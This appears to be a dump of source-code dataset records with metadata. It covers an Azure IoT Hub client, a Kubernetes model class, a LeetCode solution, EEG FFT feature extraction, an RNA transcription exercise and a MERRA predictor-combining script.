CertificatesOperations,
IotHubOperations,
IotHubResourceOperations,
Operations,
PrivateEndpointConnectionsOperations,
PrivateLinkResourcesOperations,
ResourceProviderCommonOperations,
)
if TYPE_CHECKING:
# pylint: disable=unused-import,ungrouped-imports
from azure.core.credentials import TokenCredential
class IotHubClient: # pylint: disable=client-accepts-api-version-keyword,too-many-instance-attributes
"""Use this API to manage the IoT hubs in your Azure subscription.
:ivar operations: Operations operations
:vartype operations: azure.mgmt.iothub.v2022_04_30_preview.operations.Operations
:ivar iot_hub_resource: IotHubResourceOperations operations
:vartype iot_hub_resource:
azure.mgmt.iothub.v2022_04_30_preview.operations.IotHubResourceOperations
:ivar resource_provider_common: ResourceProviderCommonOperations operations
:vartype resource_provider_common:
azure.mgmt.iothub.v2022_04_30_preview.operations.ResourceProviderCommonOperations
:ivar certificates: CertificatesOperations operations
:vartype certificates: azure.mgmt.iothub.v2022_04_30_preview.operations.CertificatesOperations
:ivar iot_hub: IotHubOperations operations
:vartype iot_hub: azure.mgmt.iothub.v2022_04_30_preview.operations.IotHubOperations
:ivar private_link_resources: PrivateLinkResourcesOperations operations
:vartype private_link_resources:
azure.mgmt.iothub.v2022_04_30_preview.operations.PrivateLinkResourcesOperations
:ivar private_endpoint_connections: PrivateEndpointConnectionsOperations operations
:vartype private_endpoint_connections:
azure.mgmt.iothub.v2022_04_30_preview.operations.PrivateEndpointConnectionsOperations
:param credential: Credential needed for the client to connect to Azure. Required.
:type credential: ~azure.core.credentials.TokenCredential
:param subscription_id: The subscription identifier. Required.
:type subscription_id: str
:param base_url: Service URL. Default value is "https://management.azure.com".
:type base_url: str
:keyword api_version: Api Version. Default value is "2022-04-30-preview". Note that overriding
this default value may result in unsupported behavior.
:paramtype api_version: str
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
"""
def __init__(
self,
credential: "TokenCredential",
subscription_id: str,
base_url: str = "https://management.azure.com",
**kwargs: Any
) -> None:
self._config = IotHubClientConfiguration(credential=credential, subscription_id=subscription_id, **kwargs)
self._client: ARMPipelineClient = ARMPipelineClient(base_url=base_url, config=self._config, **kwargs)
client_models = {k: v for k, v in _models.__dict__.items() if isinstance(v, type)}
self._serialize = Serializer(client_models)
self._deserialize = Deserializer(client_models)
self._serialize.client_side_validation = False
self.operations = Operations(self._client, self._config, self._serialize, self._deserialize)
self.iot_hub_resource = IotHubResourceOperations(self._client, self._config, self._serialize, self._deserialize)
self.resource_provider_common = ResourceProviderCommonOperations(
self._client, self._config, self._serialize, self._deserialize
)
self.certificates = CertificatesOperations(self._client, self._config, self._serialize, self._deserialize)
self.iot_hub = IotHubOperations(self._client, self._config, self._serialize, self._deserialize)
self.private_link_resources = PrivateLinkResourcesOperations(
self._client, self._config, self._serialize, self._deserialize
)
self.private_endpoint_connections = PrivateEndpointConnectionsOperations(
self._client, self._config, self._serialize, self._deserialize
)
def _send_request(self, request: HttpRequest, **kwargs: Any) -> HttpResponse:
"""Runs the network request through the client's chained policies.
>>> from azure.core.rest import HttpRequest
>>> request = HttpRequest("GET", "https://www.example.org/")
<HttpRequest [GET], url: 'https://www.example.org/'>
>>> response = client._send_request(request)
<HttpResponse: 200 OK>
For more information on this code flow, see https://aka.ms/azsdk/dpcodegen/python/send_request
:param request: The network request you want to make. Required.
:type request: ~azure.core.rest.HttpRequest
:keyword bool stream: Whether the response payload will be streamed. Defaults to False.
:return: The response of your network call. Does not do error handling on your response.
:rtype: ~azure.core.rest.HttpResponse
"""
request_copy = deepcopy(request)
request_copy.url = self._client.format_url(request_copy.url)
return self._client.send_request(request_copy, **kwargs)
def close(self) -> None:
self._client.close()
def __enter__(self) -> "IotHubClient":
self._client.__enter__()
return self
def __exit__(self, *exc_details: Any) -> None:
self._client.__exit__(*exc_details)
|
[
"noreply@github.com"
] |
Azure.noreply@github.com
|
25e7256a2278380559a276d1b3e444401d66c3f7
|
14bca3c05f5d8de455c16ec19ac7782653da97b2
|
/lib/kubernetes/client/models/v1beta1_custom_resource_subresource_scale.py
|
ed95df565c96d745a54209552e5348bb1e35de08
|
[
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
hovu96/splunk_as_a_service_app
|
167f50012c8993879afbeb88a1f2ba962cdf12ea
|
9da46cd4f45603c5c4f63ddce5b607fa25ca89de
|
refs/heads/master
| 2020-06-19T08:35:21.103208
| 2020-06-16T19:07:00
| 2020-06-16T19:07:00
| 196,641,210
| 8
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,791
|
py
|
# coding: utf-8
"""
Kubernetes
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen)
OpenAPI spec version: v1.14.4
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from pprint import pformat
from six import iteritems
import re
class V1beta1CustomResourceSubresourceScale(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'label_selector_path': 'str',
'spec_replicas_path': 'str',
'status_replicas_path': 'str'
}
attribute_map = {
'label_selector_path': 'labelSelectorPath',
'spec_replicas_path': 'specReplicasPath',
'status_replicas_path': 'statusReplicasPath'
}
def __init__(self, label_selector_path=None, spec_replicas_path=None, status_replicas_path=None):
"""
V1beta1CustomResourceSubresourceScale - a model defined in Swagger
"""
self._label_selector_path = None
self._spec_replicas_path = None
self._status_replicas_path = None
self.discriminator = None
if label_selector_path is not None:
self.label_selector_path = label_selector_path
self.spec_replicas_path = spec_replicas_path
self.status_replicas_path = status_replicas_path
@property
def label_selector_path(self):
"""
Gets the label_selector_path of this V1beta1CustomResourceSubresourceScale.
LabelSelectorPath defines the JSON path inside of a CustomResource that corresponds to Scale.Status.Selector. Only JSON paths without the array notation are allowed. Must be a JSON Path under .status. Must be set to work with HPA. If there is no value under the given path in the CustomResource, the status label selector value in the /scale subresource will default to the empty string.
:return: The label_selector_path of this V1beta1CustomResourceSubresourceScale.
:rtype: str
"""
return self._label_selector_path
@label_selector_path.setter
def label_selector_path(self, label_selector_path):
"""
Sets the label_selector_path of this V1beta1CustomResourceSubresourceScale.
LabelSelectorPath defines the JSON path inside of a CustomResource that corresponds to Scale.Status.Selector. Only JSON paths without the array notation are allowed. Must be a JSON Path under .status. Must be set to work with HPA. If there is no value under the given path in the CustomResource, the status label selector value in the /scale subresource will default to the empty string.
:param label_selector_path: The label_selector_path of this V1beta1CustomResourceSubresourceScale.
:type: str
"""
self._label_selector_path = label_selector_path
@property
def spec_replicas_path(self):
"""
Gets the spec_replicas_path of this V1beta1CustomResourceSubresourceScale.
SpecReplicasPath defines the JSON path inside of a CustomResource that corresponds to Scale.Spec.Replicas. Only JSON paths without the array notation are allowed. Must be a JSON Path under .spec. If there is no value under the given path in the CustomResource, the /scale subresource will return an error on GET.
:return: The spec_replicas_path of this V1beta1CustomResourceSubresourceScale.
:rtype: str
"""
return self._spec_replicas_path
@spec_replicas_path.setter
def spec_replicas_path(self, spec_replicas_path):
"""
Sets the spec_replicas_path of this V1beta1CustomResourceSubresourceScale.
SpecReplicasPath defines the JSON path inside of a CustomResource that corresponds to Scale.Spec.Replicas. Only JSON paths without the array notation are allowed. Must be a JSON Path under .spec. If there is no value under the given path in the CustomResource, the /scale subresource will return an error on GET.
:param spec_replicas_path: The spec_replicas_path of this V1beta1CustomResourceSubresourceScale.
:type: str
"""
if spec_replicas_path is None:
raise ValueError("Invalid value for `spec_replicas_path`, must not be `None`")
self._spec_replicas_path = spec_replicas_path
@property
def status_replicas_path(self):
"""
Gets the status_replicas_path of this V1beta1CustomResourceSubresourceScale.
StatusReplicasPath defines the JSON path inside of a CustomResource that corresponds to Scale.Status.Replicas. Only JSON paths without the array notation are allowed. Must be a JSON Path under .status. If there is no value under the given path in the CustomResource, the status replica value in the /scale subresource will default to 0.
:return: The status_replicas_path of this V1beta1CustomResourceSubresourceScale.
:rtype: str
"""
return self._status_replicas_path
@status_replicas_path.setter
def status_replicas_path(self, status_replicas_path):
"""
Sets the status_replicas_path of this V1beta1CustomResourceSubresourceScale.
StatusReplicasPath defines the JSON path inside of a CustomResource that corresponds to Scale.Status.Replicas. Only JSON paths without the array notation are allowed. Must be a JSON Path under .status. If there is no value under the given path in the CustomResource, the status replica value in the /scale subresource will default to 0.
:param status_replicas_path: The status_replicas_path of this V1beta1CustomResourceSubresourceScale.
:type: str
"""
if status_replicas_path is None:
raise ValueError("Invalid value for `status_replicas_path`, must not be `None`")
self._status_replicas_path = status_replicas_path
def to_dict(self):
"""
Returns the model properties as a dict
"""
result = {}
for attr, _ in iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""
Returns the string representation of the model
"""
return pformat(self.to_dict())
def __repr__(self):
"""
For `print` and `pprint`
"""
return self.to_str()
def __eq__(self, other):
"""
Returns true if both objects are equal
"""
if not isinstance(other, V1beta1CustomResourceSubresourceScale):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""
Returns true if both objects are not equal
"""
return not self == other
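# --- usage sketch (illustrative; not part of the generated model) ---
# A minimal, hedged example of constructing the model defined above and
# round-tripping it through to_dict(); the JSON paths are illustrative values.
if __name__ == "__main__":
    scale = V1beta1CustomResourceSubresourceScale(
        label_selector_path=".status.labelSelector",
        spec_replicas_path=".spec.replicas",
        status_replicas_path=".status.replicas",
    )
    # to_dict() walks swagger_types, so all three attributes appear as keys
    print(scale.to_dict())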
|
[
"robert.fujara@gmail.com"
] |
robert.fujara@gmail.com
|
71335d29712b442c9ce5d95ca32fd48dad3c6e99
|
0567fcd808397a7024b5009cc290de1c414eff06
|
/src/1470.shuffle-the-array.py
|
7f9045ee0e7612652fc26cad85239700fb747fbe
|
[] |
no_license
|
tientheshy/leetcode-solutions
|
d3897035a7fd453b9f47647e95f0f92a03bff4f3
|
218a8a97e3926788bb6320dda889bd379083570a
|
refs/heads/master
| 2023-08-23T17:06:52.538337
| 2021-10-03T01:47:50
| 2021-10-03T01:47:50
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 562
|
py
|
#
# @lc app=leetcode id=1470 lang=python3
#
# [1470] Shuffle the Array
#
# @lc code=start
class Solution:
# 80 ms, 50.80%. Time: O(N). Space: O(N). Could be improved with bit manipulation to reach O(1) space (see the sketch after this block).
# More here: https://leetcode.com/problems/shuffle-the-array/discuss/675956/In-Place-O(n)-Time-O(1)-Space-With-Explanation-and-Analysis
def shuffle(self, nums: List[int], n: int) -> List[int]:
ans = []
for i in range(n):
ans.append(nums[i])
ans.append(nums[i + n])
return ans
# @lc code=end
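# A hedged sketch of the O(1)-extra-space variant the comment above alludes to:
# pack each (x_i, y_i) pair into one array slot with bit shifts, assuming the
# LeetCode constraint nums[i] <= 10^3 (fits in 10 bits). Illustrative only,
# not the submitted solution.
class SolutionInPlace:
    def shuffle(self, nums: List[int], n: int) -> List[int]:
        for i in range(n):
            nums[i] |= nums[i + n] << 10       # upper bits hold y_i, lower bits x_i
        mask = (1 << 10) - 1
        for i in range(n - 1, -1, -1):         # unpack back-to-front to avoid clobbering
            nums[2 * i + 1] = nums[i] >> 10    # y_i
            nums[2 * i] = nums[i] & mask       # x_i
        return nums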
|
[
"trung.nang.hoang@gmail.com"
] |
trung.nang.hoang@gmail.com
|
d0a9e939c12148512e62d5cb50faeaf448f9dc4a
|
489d0c9b861e22dbb781c87c6e509bd2d04e783d
|
/codes/Feature Extraction/FeatureExtraction(3 features).py
|
d53977ab65b673c802b375f3f72da2e1d21612b3
|
[] |
no_license
|
sameesayeed007/Prediction-of-Epileptic-Seizures-using-SVM-and-DSP
|
24af3755b4c2bd4646d05df52f4f306ed2902ab0
|
cdd972551f9cea1a90cc957f33ac656a09e48c9f
|
refs/heads/master
| 2022-06-19T00:10:38.822712
| 2020-05-10T16:59:23
| 2020-05-10T16:59:23
| 262,826,669
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,733
|
py
|
import numpy as np
import scipy as sp
import scipy.fftpack
import pandas as pd
from scipy.fftpack import fft, fftfreq, fftshift
import statistics
thesis_final_files = ['chb01_21Final.csv','chb01_26Final.csv']
iterator = 0
while(iterator < len(thesis_final_files)) :
file_name = thesis_final_files[iterator]
data = pd.read_csv(file_name)
a=[]
d=0
for i in range(23):
Channel = data.iloc[:,i]
num_of_iterations = int((len(Channel)-1)/2560)
# making a list of lists of 10-second windows (2560 samples each)
#a=[]
p=0
q= 2560
b=[]
for i in range(num_of_iterations):
c=[]
for j in range(2560):
c.append(Channel[p])
p+=1
b.append(c)
a.append(b)
print(d)
d=d+1
print('**1**')
def angle(a):
#no of points
n=2560
#Time period is 10s
Lx=10
x=np.linspace(0,Lx,n)
#Creating all the necessary frequencies
freqs=fftfreq(n)
#mask array to be used for power spectra
#ignoring half the values, as they are complex conjugates of the other half
mask=freqs>0
#FFT values
fft_values=fft(a)
#true theoretical fft values
fft_theo = 2.0*np.abs(fft_values/n)
#FFT shift
fftshift_values = fftshift(fft_values)
#Calculating the angle
out_angle = np.angle(fftshift_values, deg = True)
#print ("output angle in degrees : ", out_angle)
out_angle2=statistics.mean(abs(out_angle))
#print("Mean angle: ")
return out_angle2
#Calculates the energy
def energy(a):
#no of points
n=2560
#Time period is 10s
Lx=10
x=np.linspace(0,Lx,n)
#Creating all the necessary frequencies
freqs=fftfreq(n)
#mask array to be used for power spectra
#ignoring half the values, as they are complex conjugates of the other half
mask=freqs>0
#FFT values
fft_values=fft(a)
#true theoretical fft values
fft_theo = 2.0*np.abs(fft_values/n)
#FFT shift
fftshift_values = fftshift(fft_values)
ps = 2.0*(np.abs(fft_values/n)**2)
#Calculating the mean of the power spectrum (the energy feature)
ps_mean = statistics.mean(ps)
return ps_mean
#Calculates the amplitude
def amplitude(a):
#no of points
n=2560
#Time period is 10s
Lx=10
x=np.linspace(0,Lx,n)
#Creating all the necessary frequencies
freqs=fftfreq(n)
#mask array to be used for power spectra
#ignoring half the values, as they are complex conjugates of the other half
mask=freqs>0
#FFT values
fft_values=fft(a)
#true theoretical fft values
fft_theo = 2.0*np.abs(fft_values/n)
#FFT shift
fftshift_values = fftshift(fft_values)
amplitudes = 2 / n * np.abs(fft_values)
amplitudes_mean = statistics.mean(amplitudes)
return amplitudes_mean
#Channel=[]
Channel=[] #23
#tenseconds=[]
for m in range(23):
tenseconds=[]
for n in range(540):
features=[]
angle_value=angle(a[m][n])
features.append(angle_value)
energy_value=energy(a[m][n])
features.append(energy_value)
amplitude_value=amplitude(a[m][n])
features.append(amplitude_value)
tenseconds.append(features)
Channel.append(tenseconds)
print('**2**')
w=1
x=[]
df1 = pd.DataFrame()
ind=[]
for j in range(540):
ind.append(w)
w=w+1
df1['index']=ind
C="c"
F='f'
for i in range(23):
for f in range(3):
g=[]
name="C"+str(i+1)+"F"+str(f+1)
for j in range(540):
r=Channel[i][j][f]
g.append(r)
df1[name]=g
cvalue=[]
for i in range(360):
cvalue.append(0)
for j in range(180):
cvalue.append(1)
df1['class']=cvalue
saved_feature_file_name = file_name[0:8] + 'S.csv'
df1.to_csv(saved_feature_file_name,index=False)
print('**3**')
iterator += 1
print('***********************************************')
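# --- hedged sanity check (illustrative; not part of the pipeline above) ---
# For a pure 5 Hz sine of amplitude 3, sampled like the 10 s / 2560-point
# windows used above, the 2/n * |fft| spectrum should peak near 5 Hz with
# height close to 3 (up to spectral leakage from the endpoint-inclusive linspace).
def _fft_sanity_check():
    n, Lx = 2560, 10
    t = np.linspace(0, Lx, n)
    sig = 3.0 * np.sin(2 * np.pi * 5 * t)
    amps = 2.0 / n * np.abs(fft(sig))
    freqs = fftfreq(n, d=Lx / n)
    k = np.argmax(amps[: n // 2])
    return freqs[k], amps[k]  # expect roughly (5.0, 3.0)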
|
[
"sameesayeed880@gmail.com"
] |
sameesayeed880@gmail.com
|
a65d1a542c88c350b4f72b6ab7ca1593bca262a2
|
07ec5a0b3ba5e70a9e0fb65172ea6b13ef4115b8
|
/lib/python3.6/site-packages/tensorflow/contrib/labeled_tensor/python/ops/sugar.py
|
a80c8809882161ab99456117a0e3bd46222439f1
|
[] |
no_license
|
cronos91/ML-exercise
|
39c5cd7f94bb90c57450f9a85d40c2f014900ea4
|
3b7afeeb6a7c87384049a9b87cac1fe4c294e415
|
refs/heads/master
| 2021-05-09T22:02:55.131977
| 2017-12-14T13:50:44
| 2017-12-14T13:50:44
| 118,736,043
| 0
| 0
| null | 2018-01-24T08:30:23
| 2018-01-24T08:30:22
| null |
UTF-8
|
Python
| false
| false
| 129
|
py
|
version https://git-lfs.github.com/spec/v1
oid sha256:bd2f92e1bb5733974c243de95a2275942d5c2567b858a4babde5074896e254c0
size 4821
|
[
"seokinj@jangseog-in-ui-MacBook-Pro.local"
] |
seokinj@jangseog-in-ui-MacBook-Pro.local
|
310d466c5d33bc5941084acae385c83ac0b33b25
|
781e2692049e87a4256320c76e82a19be257a05d
|
/all_data/exercism_data/python/rna-transcription/fc224d30443944ccb7072df9ef1a4e3b.py
|
e0bfc8d46549b897dc275dd321beb33d587074e7
|
[] |
no_license
|
itsolutionscorp/AutoStyle-Clustering
|
54bde86fe6dbad35b568b38cfcb14c5ffaab51b0
|
be0e2f635a7558f56c61bc0b36c6146b01d1e6e6
|
refs/heads/master
| 2020-12-11T07:27:19.291038
| 2016-03-16T03:18:00
| 2016-03-16T03:18:42
| 59,454,921
| 4
| 0
| null | 2016-05-23T05:40:56
| 2016-05-23T05:40:56
| null |
UTF-8
|
Python
| false
| false
| 222
|
py
|
__author__ = 'shandr'
def to_rna(dna):
rna_list = []
dna_rna_map = {'G':'C','C':'G','T':'A','A':'U'}
for letter in dna:
rna_list.append(dna_rna_map[letter])
rna = ''.join(rna_list)
return rna
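# An equivalent, more idiomatic sketch using str.translate (assumes the input
# is valid DNA over G/C/T/A; an illustrative alternative, not the submitted code):
_RNA_TABLE = str.maketrans('GCTA', 'CGAU')
def to_rna_translate(dna):
    return dna.translate(_RNA_TABLE)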
|
[
"rrc@berkeley.edu"
] |
rrc@berkeley.edu
|
258f78e6084bfc82db551b44bb0c9ecd4317def7
|
facb8b9155a569b09ba66aefc22564a5bf9cd319
|
/wp2/merra_scripts/01_netCDF_extraction/merra902Combine/514-tideGauge.py
|
93ddf87ea463c8e4498d9c7309742f95dda401cf
|
[] |
no_license
|
moinabyssinia/modeling-global-storm-surges
|
13e69faa8f45a1244a964c5de4e2a5a6c95b2128
|
6e385b2a5f0867df8ceabd155e17ba876779c1bd
|
refs/heads/master
| 2023-06-09T00:40:39.319465
| 2021-06-25T21:00:44
| 2021-06-25T21:00:44
| 229,080,191
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,376
|
py
|
# -*- coding: utf-8 -*-
"""
Created on Tue Jun 17 11:28:00 2020
--------------------------------------------
Load predictors for each TG and combine them
--------------------------------------------
@author: Michael Tadesse
"""
import os
import pandas as pd
#define directories
# dir_name = 'F:\\01_erainterim\\01_eraint_predictors\\eraint_D3'
dir_in = "/lustre/fs0/home/mtadesse/merraLocalized"
dir_out = "/lustre/fs0/home/mtadesse/merraAllCombined"
def combine():
os.chdir(dir_in)
#get names
tg_list_name = os.listdir()
x = 514
y = 515
for tg in range(x, y):
os.chdir(dir_in)
tg_name = tg_list_name[tg]
print(tg_name, '\n')
#looping through each TG folder
os.chdir(tg_name)
#check for empty folders
if len(os.listdir()) == 0:
continue
#defining the path for each predictor
where = os.getcwd()
csv_path = {'slp' : os.path.join(where, 'slp.csv'),\
"wnd_u": os.path.join(where, 'wnd_u.csv'),\
'wnd_v' : os.path.join(where, 'wnd_v.csv')}
first = True
for pr in csv_path.keys():
print(tg_name, ' ', pr)
#read predictor
pred = pd.read_csv(csv_path[pr])
#remove unwanted columns
pred.drop(['Unnamed: 0'], axis = 1, inplace=True)
#sort based on date as merra files are scrambled
pred.sort_values(by = 'date', inplace=True)
#give predictor columns a name
pred_col = list(pred.columns)
for pp in range(len(pred_col)):
if pred_col[pp] == 'date':
continue
pred_col[pp] = pr + str(pred_col[pp])
pred.columns = pred_col
#merge all predictors
if first:
pred_combined = pred
first = False
else:
pred_combined = pd.merge(pred_combined, pred, on = 'date')
#saving pred_combined
os.chdir(dir_out)
tg_name = str(tg) + "_" + tg_name
pred_combined.to_csv('.'.join([tg_name, 'csv']))
os.chdir(dir_in)
print('\n')
#run script
combine()
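# --- hedged illustration (hypothetical data; not part of the script) ---
# The pd.merge(..., on='date') step above builds one wide row per timestamp,
# e.g. joining an slp column with a wnd_u column:
def _merge_demo():
    slp = pd.DataFrame({'date': ['2000-01-01', '2000-01-02'], 'slp0': [1012.1, 1009.8]})
    wnd_u = pd.DataFrame({'date': ['2000-01-01', '2000-01-02'], 'wnd_u0': [2.3, -1.1]})
    return pd.merge(slp, wnd_u, on='date')  # columns: date, slp0, wnd_u0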
|
[
"michaelg.tadesse@gmail.com"
] |
michaelg.tadesse@gmail.com
|